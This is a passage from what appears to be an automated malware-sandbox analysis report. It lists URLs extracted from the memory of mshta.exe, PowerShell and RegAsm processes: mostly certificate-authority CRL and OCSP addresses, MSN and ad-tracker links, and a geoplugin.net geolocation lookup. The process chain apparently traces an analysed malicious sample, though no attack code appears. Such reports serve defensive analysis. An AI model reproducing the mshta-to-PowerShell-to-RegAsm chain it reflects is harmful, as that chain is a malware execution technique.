mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.546607797.000000001A8D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.527099741.000000000037D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: powershell.exe, 0000000E.00000002.531621605.000000001C1CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.n
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: mshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.479652783.000000001A752000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.530346179.000000001AB5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.546607797.000000001A917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                    Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000013.00000002.516210163.000000001C318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
                    Source: powershell.exe, 00000007.00000002.470636519.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 0000000E.00000002.530346179.000000001AB9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: powershell.exe, 00000007.00000002.479386384.0000000012421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.527099741.000000000037D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C1F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.530346179.000000001AAEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.546607797.000000001A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1CC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                    Source: powershell.exe, 00000007.00000002.470636519.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.540782359.000000000230B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.494455760.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.502469699.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.555400869.0000000002372000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.528837930.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                    Source: bhvCD3E.tmp.26.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
